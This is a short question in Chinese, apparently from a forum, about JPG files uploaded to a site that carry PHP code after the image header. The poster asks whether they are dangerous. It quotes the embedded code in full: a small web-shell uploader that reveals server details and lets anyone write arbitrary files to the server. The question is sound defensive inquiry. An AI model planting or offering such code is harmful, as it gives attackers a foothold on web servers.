2
用戶上傳了一些似乎包含一些php代碼的jpg圖像。文件開頭爲NUL DLE JFIF NUL SOH SOH SOH NUL NUL
NUL NUL NUL SYN Exif NUL NUL II * ...(大量空字符等)。然後下面的php代碼:用戶上傳包含php代碼的jpg文件 - 這是潛在的病毒
echo '<b><br><br>'.php_uname().'<br></b>';
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if($_POST['_upl'] == "Upload") {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload SUKSES !!!</b><br><br>'; }
else { echo '<b>Upload GAGAL !!!</b><br><br>'; }
}
後面跟着大量的二進制代碼。圖像顯示一隻黑色的腳(如將腳放在掃描儀或複印機上)。
這些圖像是否有潛在危險?如果是,如何。